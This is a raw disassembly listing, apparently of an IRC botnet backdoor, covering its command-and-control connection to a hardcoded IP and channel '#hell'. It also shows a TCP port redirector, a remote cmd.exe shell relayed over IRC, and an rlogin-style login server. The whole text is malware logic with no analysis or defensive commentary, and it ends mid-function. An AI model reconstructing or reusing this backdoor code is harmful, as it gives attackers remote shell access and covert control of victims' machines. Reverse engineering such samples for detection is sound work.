inc [ebp+var_4]
cmp [ebp+var_4], 3
jl short loc_40FF20
cmp [ebp+var_8], 2
jz loc_410017
cmp [ebp+var_C], 0
jz short loc_40FFCA
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push ebx
call sub_4169C0
mov eax, dword_42FCB0
push 3Fh
push offset aHell ; "#hell"
push edi
mov dword_47FF24, eax
call sub_4169C0
push 3Fh
push offset aTroopers ; "troopers"
push esi
call sub_4169C0
add esp, 24h
and [ebp+var_C], 0
jmp loc_40FF1C
; ---------------------------------------------------------------------------
loc_40FFCA: ; CODE XREF: sub_40FAD0+4BB�j
cmp byte_42FD28, 0
jz loc_40FF1C
push 7Fh
push offset byte_42FD28
push ebx
call sub_4169C0
mov eax, dword_42FCB4
push 3Fh
push offset dword_42FD34
push edi
mov dword_47FF24, eax
call sub_4169C0
push 3Fh
push offset aTroopers_0 ; "troopers"
push esi
call sub_4169C0
add esp, 24h
mov [ebp+var_C], 1
jmp loc_40FF1C
; ---------------------------------------------------------------------------
loc_410017: ; CODE XREF: sub_40FAD0+487�j
; sub_40FAD0+4B1�j
call sub_413827
loc_41001C: ; CODE XREF: sub_40FAD0+A3�j
; sub_40FAD0+B0�j
call dword_43A4BC ; WSACleanup
loc_410022: ; CODE XREF: sub_40FAD0+96�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40FAD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_41002B proc near ; DATA XREF: sub_4100C6+12C�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_416B20
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov ebx, 1000h
jmp short loc_410080
; ---------------------------------------------------------------------------
loc_410065: ; CODE XREF: sub_41002B+7B�j
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push dword_43B24C[esi]
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4100A8
loc_410080: ; CODE XREF: sub_41002B+38�j
xor eax, eax
push eax
lea edi, [ebp+var_1128]
mov ecx, 400h
rep stosd
push ebx
lea eax, [ebp+var_1128]
push eax
push dword_43B250[esi]
call dword_43A304 ; recv
test eax, eax
jg short loc_410065
loc_4100A8: ; CODE XREF: sub_41002B+53�j
push dword_43B250[esi]
call dword_43A4B0 ; closesocket
push [ebp+var_14]
call sub_41397A
pop ecx
push 0
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_41002B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4100C6 proc near ; DATA XREF: sub_4102A3+118�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_416B20
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_144]
rep movsd
mov esi, [ebp+var_30]
xor ecx, ecx
inc ecx
push 6
push ecx
push 2
mov [eax+120h], ecx
mov [ebp+var_4], esi
call dword_43A39C ; socket
xor ebx, ebx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_410225
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
mov [ebp+var_18], 2
call dword_43A4F4 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_43A414 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_41014E
lea eax, [ebp+var_13C]
push eax
call dword_43A400 ; gethostbyname
jmp short loc_41015C
; ---------------------------------------------------------------------------
loc_41014E: ; CODE XREF: sub_4100C6+77�j
push 2
push 4
lea eax, [ebp+var_8]
push eax
call dword_43A494 ; gethostbyaddr
loc_41015C: ; CODE XREF: sub_4100C6+86�j
cmp eax, ebx
jz loc_410225
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
push 10h
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jz loc_410225
push [ebp+var_34]
movzx eax, [ebp+var_16]
push eax
push [ebp+var_14]
mov [ebp+var_20], ebx
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset aRedirectClient ; "[REDIRECT]: Client connection to IP: %s"...
push eax
call sub_416905
push [ebp+arg_0]
lea eax, [ebp+var_344]
push 11h
push eax
call sub_4136B6
imul esi, 234h
mov ecx, [ebp+var_34]
mov [ebp+var_30], eax
imul eax, 234h
mov dword_43B244[eax], ecx
add esp, 20h
lea esi, dword_43B24C[esi]
mov ecx, [esi]
mov dword_43B250[eax], ecx
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_144]
push eax
push offset sub_41002B
push ebx
push ebx
call dword_422008 ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, ebx
mov dword_43B254[ecx], eax
jnz short loc_41025B
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_0 ; "[REDIRECT]: Failed to start connection "...
call sub_401F41
pop ecx
pop ecx
loc_410225: ; CODE XREF: sub_4100C6+42�j
; sub_4100C6+98�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_43B24C[eax]
call dword_43A4B0 ; closesocket
push [ebp+arg_0]
call dword_43A4B0 ; closesocket
push [ebp+var_4]
call sub_41397A
pop ecx
push ebx
call dword_422010 ; ExitThread
loc_410253: ; CODE XREF: sub_4100C6+198�j
push 32h
call dword_422000 ; Sleep
loc_41025B: ; CODE XREF: sub_4100C6+14A�j
cmp [ebp+var_20], ebx
jz short loc_410253
jmp short loc_410279
; ---------------------------------------------------------------------------
loc_410262: ; CODE XREF: sub_4100C6+1D9�j
push ebx
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz short loc_410225
loc_410279: ; CODE XREF: sub_4100C6+19A�j
xor eax, eax
push ebx
lea edi, [ebp+var_1344]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+var_1344]
push eax
push dword ptr [esi]
call dword_43A304 ; recv
cmp eax, ebx
jg short loc_410262
jmp short loc_410225
sub_4100C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102A3 proc near ; DATA XREF: sub_409806+2A78�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 4Ah
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push [ebp+var_40]
xor esi, esi
inc esi
mov [eax+120h], esi
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_43A4F4 ; ntohs
push 6
push esi
xor ebx, ebx
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], ebx
mov [ebp+arg_0], 10h
call dword_43A39C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_410402
mov eax, [ebp+var_3C]
imul eax, 234h
push esi
push 401h
push ebx
push edi
mov dword_43B24C[eax], edi
call dword_43A42C ; WSAAsyncSelect
push 10h
lea eax, [ebp+var_10]
push eax
push edi
call dword_43A47C ; bind
test eax, eax
jnz loc_410402
push 0Ah
push edi
call dword_43A4C8 ; listen
test eax, eax
jnz loc_410402
loc_410349: ; CODE XREF: sub_4102A3+BA�j
; sub_4102A3+15A�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_43A35C ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_410349
push [ebp+var_3C]
movzx eax, [ebp+var_22]
push eax
push [ebp+var_20]
mov [ebp+var_148], esi
mov [ebp+var_2C], ebx
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+var_34C]
push offset aRedirectClie_0 ; "[REDIRECT]: Client connection from IP: "...
push eax
call sub_416905
push esi
lea eax, [ebp+var_34C]
push 11h
push eax
call sub_4136B6
mov ecx, [ebp+var_3C]
mov [ebp+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_43B244[eax], ecx
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_14C]
push eax
push offset sub_4100C6
push ebx
push ebx
call dword_422008 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, ebx
mov dword_43B254[ecx], eax
jnz short loc_4103F8
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_1 ; "[REDIRECT]: Failed to start client thre"...
call sub_401F41
pop ecx
pop ecx
jmp short loc_410405
; ---------------------------------------------------------------------------
loc_4103F0: ; CODE XREF: sub_4102A3+158�j
push 32h
call dword_422000 ; Sleep
loc_4103F8: ; CODE XREF: sub_4102A3+136�j
cmp [ebp+var_2C], ebx
jz short loc_4103F0
jmp loc_410349
; ---------------------------------------------------------------------------
loc_410402: ; CODE XREF: sub_4102A3+5D�j
; sub_4102A3+8F�j ...
mov esi, [ebp+arg_0]
loc_410405: ; CODE XREF: sub_4102A3+14B�j
push esi
call dword_43A4B0 ; closesocket
push edi
call dword_43A4B0 ; closesocket
push [ebp+var_3C]
call sub_41397A
pop ecx
push ebx
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_4102A3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_410424 proc near ; CODE XREF: sub_410454+30�p
; sub_410492+85�p ...
mov eax, dword_480AD4
cmp eax, 0FFFFFFFFh
push esi
mov esi, dword_42202C
jz short loc_410438
push eax
call esi ; CloseHandle
loc_410438: ; CODE XREF: sub_410424+F�j
mov eax, dword_480AD0
cmp eax, 0FFFFFFFFh
jz short loc_410445
push eax
call esi ; CloseHandle
loc_410445: ; CODE XREF: sub_410424+1C�j
mov eax, dword_480B0C
cmp eax, 0FFFFFFFFh
jz short loc_410452
push eax
call esi ; CloseHandle
loc_410452: ; CODE XREF: sub_410424+29�j
pop esi
retn
sub_410424 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410454 proc near ; CODE XREF: sub_409806+3D9B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_41045E: ; CODE XREF: sub_410454+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41045E
push 0
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
push [ebp+arg_0]
mov [ebp+var_4], eax
push dword_480AC8
call dword_422030 ; WriteFile
test eax, eax
jnz short loc_41048D
call sub_410424
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41048D: ; CODE XREF: sub_410454+2E�j
xor eax, eax
inc eax
leave
retn
sub_410454 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410492 proc near ; CODE XREF: sub_410520+D9�p
; sub_410520+11F�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
mov esi, [ebp+arg_4]
xor ecx, ecx
push edi
inc ecx
mov edi, 422B0Ah
xor eax, eax
repe cmpsb
pop edi
pop esi
jz short loc_4104D7
push 0FAh
call dword_422000 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_416905
add esp, 10h
jmp short loc_4104EE
; ---------------------------------------------------------------------------
loc_4104D7: ; CODE XREF: sub_410492+1C�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_3 ; "%s"
push eax
call sub_416905
add esp, 0Ch
loc_4104EE: ; CODE XREF: sub_410492+43�j
lea eax, [ebp+var_200]
lea edx, [eax+1]
loc_4104F7: ; CODE XREF: sub_410492+6A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4104F7
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43A438 ; send
test eax, eax
jg short loc_41051C
call sub_410424
loc_41051C: ; CODE XREF: sub_410492+83�j
xor eax, eax
leave
retn
sub_410492 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410520 proc near ; DATA XREF: sub_4106AD+16A�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
xor eax, eax
mov ebx, 80h
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
xor edi, edi
push edi
push edi
lea eax, [ebp+var_4]
push eax
mov esi, 200h
push esi
lea eax, [ebp+var_20C]
push eax
push dword_480AD4
call dword_42210C ; PeekNamedPipe
test eax, eax
jz loc_41062F
jmp short loc_41056A
; ---------------------------------------------------------------------------
loc_410568: ; CODE XREF: sub_410520+109�j
xor edi, edi
loc_41056A: ; CODE XREF: sub_410520+46�j
cmp [ebp+var_4], edi
jnz short loc_41059A
lea eax, [ebp+var_8]
push eax
push dword_480B0C
call dword_422108 ; GetExitCodeProcess
test eax, eax
jz short loc_410590
cmp [ebp+var_8], 103h
jnz loc_41065C
loc_410590: ; CODE XREF: sub_410520+61�j
push 0Ah
call dword_422000 ; Sleep
jmp short loc_410601
; ---------------------------------------------------------------------------
loc_41059A: ; CODE XREF: sub_410520+4D�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_4105B5
loc_4105A1: ; CODE XREF: sub_410520+93�j
cmp [ebp+eax+var_20C], 0Ah
jz loc_410653
inc eax
cmp eax, [ebp+var_4]
jb short loc_4105A1
loc_4105B5: ; CODE XREF: sub_410520+7F�j
mov [ebp+var_4], esi
loc_4105B8: ; CODE XREF: sub_410520+137�j
xor eax, eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push dword_480AD4
call dword_42208C ; ReadFile
test eax, eax
jz loc_410684
lea eax, [ebp+var_20C]
push eax
push offset dword_480AD8
push dword_480ACC
call sub_410492
add esp, 0Ch
loc_410601: ; CODE XREF: sub_410520+78�j
xor eax, eax
push eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_4]
push eax
push esi
lea eax, [ebp+var_20C]
push eax
push dword_480AD4
call dword_42210C ; PeekNamedPipe
test eax, eax
jnz loc_410568
loc_41062F: ; CODE XREF: sub_410520+40�j
push offset aCmdCouldNotRea ; "[CMD]: Could not read data from procces"...
push offset dword_480AD8
push dword_480ACC
call sub_410492
push [ebp+arg_0]
call sub_41397A
add esp, 10h
push 1
jmp short loc_4106A6
; ---------------------------------------------------------------------------
loc_410653: ; CODE XREF: sub_410520+89�j
inc eax
mov [ebp+var_4], eax
jmp loc_4105B8
; ---------------------------------------------------------------------------
loc_41065C: ; CODE XREF: sub_410520+6A�j
call sub_410424
push offset aCmdProccessHas ; "[CMD]: Proccess has terminated.\r\n"
push offset dword_480AD8
push dword_480ACC
call sub_410492
push [ebp+arg_0]
call sub_41397A
add esp, 10h
push edi
jmp short loc_4106A6
; ---------------------------------------------------------------------------
loc_410684: ; CODE XREF: sub_410520+C1�j
push offset aCmdCouldNotR_0 ; "[CMD]: Could not read data from procces"...
push offset dword_480AD8
push dword_480ACC
call sub_410492
push [ebp+arg_0]
call sub_41397A
add esp, 10h
push 0
loc_4106A6: ; CODE XREF: sub_410520+131�j
; sub_410520+162�j
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_410520 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4106AD proc near ; CODE XREF: sub_409806+4C89�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
call sub_410424
xor esi, esi
push esi
lea eax, [ebp+var_178]
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_43A3BC ; SearchPathA
test eax, eax
jnz short loc_4106E4
or eax, 0FFFFFFFFh
jmp loc_410859
; ---------------------------------------------------------------------------
loc_4106E4: ; CODE XREF: sub_4106AD+2D�j
push ebx
push edi
mov edi, dword_422114
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push eax
xor ebx, ebx
lea eax, [ebp+var_10]
inc ebx
push eax
mov [ebp+var_1C], 0Ch
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jnz short loc_410717
loc_41070F: ; CODE XREF: sub_4106AD+7B�j
; sub_4106AD+9D�j ...
or eax, 0FFFFFFFFh
jmp loc_410857
; ---------------------------------------------------------------------------
loc_410717: ; CODE XREF: sub_4106AD+60�j
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz short loc_41070F
mov edi, dword_4220E0
push 3
push esi
push esi
push offset dword_480AC8
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call dword_422110 ; DuplicateHandle
test eax, eax
jz short loc_41070F
xor eax, eax
lea edi, [ebp+var_2C]
stosd
stosd
stosd
push 11h
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_74]
rep stosd
mov eax, [ebp+var_4]
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
push esi
mov ebx, 422B0Ah
push ebx
lea eax, [ebp+var_178]
push eax
mov [ebp+var_74], 44h
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call dword_422044 ; CreateProcessA
test eax, eax
jz loc_41070F
push [ebp+var_4]
mov edi, dword_42202C
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_480AD4, eax
mov eax, [ebp+var_8]
mov dword_480AD0, eax
mov eax, [ebp+var_2C]
mov dword_480B0C, eax
call edi ; CloseHandle
cmp [ebp+arg_4], esi
mov eax, [ebp+arg_0]
mov dword_480ACC, eax
jz short loc_4107E3
push [ebp+arg_4]
jmp short loc_4107E4
; ---------------------------------------------------------------------------
loc_4107E3: ; CODE XREF: sub_4106AD+12F�j
push ebx
loc_4107E4: ; CODE XREF: sub_4106AD+134�j
push offset dword_480AD8
call sub_416905
pop ecx
pop ecx
push esi
push 8
push offset aCmdRemoteComma ; "[CMD]: Remote Command Prompt"
call sub_4136B6
mov ecx, [ebp+var_24]
mov edi, eax
imul edi, 234h
add esp, 0Ch
mov dword_43B248[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_410520
push esi
push esi
call dword_422008 ; CreateThread
cmp eax, esi
mov dword_43B254[edi], eax
jnz short loc_410855
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset aCmdFailedToSta ; "[CMD]: Failed to start IO thread, error"...
push eax
call sub_416905
lea eax, [ebp+var_378]
push eax
call sub_401ECD
add esp, 10h
loc_410855: ; CODE XREF: sub_4106AD+17F�j
xor eax, eax
loc_410857: ; CODE XREF: sub_4106AD+65�j
pop edi
pop ebx
loc_410859: ; CODE XREF: sub_4106AD+32�j
pop esi
leave
retn
sub_4106AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41085C proc near ; CODE XREF: sub_4108F4+A6�p
; sub_4108F4+B6�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
loc_410863: ; CODE XREF: sub_41085C+2A�j
push 0
push 1
lea eax, [ebp+var_1]
push eax
push [ebp+arg_0]
call dword_43A304 ; recv
cmp eax, 1
jnz short loc_410899
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_4]
jz short loc_41088E
test al, al
jnz short loc_410863
xor eax, eax
inc eax
loc_41088B: ; CODE XREF: sub_41085C+3F�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41088E: ; CODE XREF: sub_41085C+26�j
push offset aRlogindProtoco ; "[RLOGIND]: Protocol string too long."
call sub_401F41
pop ecx
loc_410899: ; CODE XREF: sub_41085C+1B�j
xor eax, eax
jmp short loc_41088B
sub_41085C endp
; =============== S U B R O U T I N E =======================================
sub_41089D proc near ; DATA XREF: sub_410B00+5A�o
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
setz al
retn
sub_41089D endp
; =============== S U B R O U T I N E =======================================
sub_4108A7 proc near ; CODE XREF: sub_4108F4+175�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_4108AC: ; CODE XREF: sub_4108A7+21�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_4108CE
test cl, cl
jz short loc_4108CA
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_4108CE
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_4108AC
loc_4108CA: ; CODE XREF: sub_4108A7+F�j
xor eax, eax
jmp short loc_4108D3
; ---------------------------------------------------------------------------
loc_4108CE: ; CODE XREF: sub_4108A7+B�j
; sub_4108A7+19�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4108D3: ; CODE XREF: sub_4108A7+25�j
test eax, eax
pop esi
jz short loc_4108F0
push [esp+arg_4]
push [esp+4+arg_0]
push offset aRlogindLoginRe ; "[RLOGIND]: Login rejected, Remote user:"...
call sub_401F41
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4108F0: ; CODE XREF: sub_4108A7+2F�j
xor eax, eax
inc eax
retn
sub_4108A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4108F4 proc near ; DATA XREF: sub_410B00+19F�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 3D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_3D4]
rep movsd
mov esi, [ebp+74h+var_208]
mov [ebp+74h+arg_0], esi
imul esi, 234h
xor edi, edi
inc edi
mov [eax+1DCh], edi
mov eax, dword_43B24C[esi]
mov [ebp+74h+var_1F0], eax
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_1F4]
push eax
push ebx
mov [ebp+74h+var_C], 1Eh
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_1F4], edi
call dword_43A448 ; select
test eax, eax
jnz short loc_41097D
push dword_43B24C[esi]
call dword_43A4B0 ; closesocket
push [ebp+74h+var_208]
loc_410972: ; CODE XREF: sub_4108F4+1A2�j
call sub_41397A
pop ecx
jmp loc_410AF8
; ---------------------------------------------------------------------------
loc_41097D: ; CODE XREF: sub_4108F4+6A�j
push ebx
push edi
lea eax, [ebp+74h+var_3C]
push eax
push dword_43B24C[esi]
call dword_43A304 ; recv
push 10h
push dword_43B24C[esi]
lea eax, [ebp+74h+var_2C]
call sub_41085C
push 10h
push dword_43B24C[esi]
lea eax, [ebp+74h+var_4C]
call sub_41085C
push 40h
push dword_43B24C[esi]
lea eax, [ebp+74h+var_F0]
call sub_41085C
add esp, 18h
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_1C]
push eax
push dword_43B24C[esi]
mov [ebp+74h+var_4], 10h
call dword_43A3E0 ; getpeername
test eax, eax
jz short loc_410A05
call dword_43A45C ; WSAGetLastError
push eax
push offset aRlogindErrorGe ; "[RLOGIND]: Error: getpeername(): <%d>."
call sub_401F41
push [ebp+74h+var_208]
call sub_41397A
add esp, 0Ch
jmp loc_410AF8
; ---------------------------------------------------------------------------
loc_410A05: ; CODE XREF: sub_4108F4+EB�j
push 2
push 4
lea eax, [ebp+74h+var_18]
push eax
call dword_43A494 ; gethostbyaddr
cmp eax, ebx
jnz short loc_410A2E
push [ebp+74h+var_18]
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_B0]
push eax
call sub_416905
pop ecx
pop ecx
jmp short loc_410A3D
; ---------------------------------------------------------------------------
loc_410A2E: ; CODE XREF: sub_4108F4+121�j
mov ecx, [eax]
lea edx, [ebp+74h+var_B0]
loc_410A33: ; CODE XREF: sub_4108F4+147�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
cmp al, bl
jnz short loc_410A33
loc_410A3D: ; CODE XREF: sub_4108F4+138�j
push ebx
push edi
push 422B0Ah
push dword_43B24C[esi]
call dword_43A438 ; send
cmp dword_480B14, ebx
jnz short loc_410A9B
push [ebp+74h+var_18]
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
lea eax, [ebp+74h+var_350]
call sub_4108A7
add esp, 0Ch
test eax, eax
jnz short loc_410A9B
push ebx
push 13h
push offset aPermissionDeni ; "Permission denied\n"
lea esi, dword_43B24C[esi]
push dword ptr [esi]
call dword_43A438 ; send
push dword ptr [esi]
call dword_43A4B0 ; closesocket
push [ebp+74h+arg_0]
jmp loc_410972
; ---------------------------------------------------------------------------
loc_410A9B: ; CODE XREF: sub_4108F4+162�j
; sub_4108F4+17F�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserLog ; "[RLOGIND]: User logged in: <%s@%s>."
call sub_401F41
push [ebp+74h+arg_0]
call sub_411CDD
add esp, 10h
test eax, eax
jnz short loc_410ADB
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRlogindErrorSe ; "[RLOGIND]: Error: SessionRun(): <%d>."
call sub_401F41
push [ebp+74h+arg_0]
call sub_41397A
add esp, 0Ch
push edi
jmp short loc_410AF9
; ---------------------------------------------------------------------------
loc_410ADB: ; CODE XREF: sub_4108F4+1C6�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserL_0 ; "[RLOGIND]: User logged out: <%s@%s>."
call sub_401F41
push [ebp+74h+arg_0]
call sub_41397A
add esp, 10h
loc_410AF8: ; CODE XREF: sub_4108F4+84�j
; sub_4108F4+10C�j
push ebx
loc_410AF9: ; CODE XREF: sub_4108F4+1E5�j
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_4108F4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B00 proc near ; DATA XREF: sub_409806+4B48�o
var_5A8 = byte ptr -5A8h
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = byte ptr -214h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A8h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_218]
rep movsd
xor esi, esi
inc esi
mov [eax+1DCh], esi
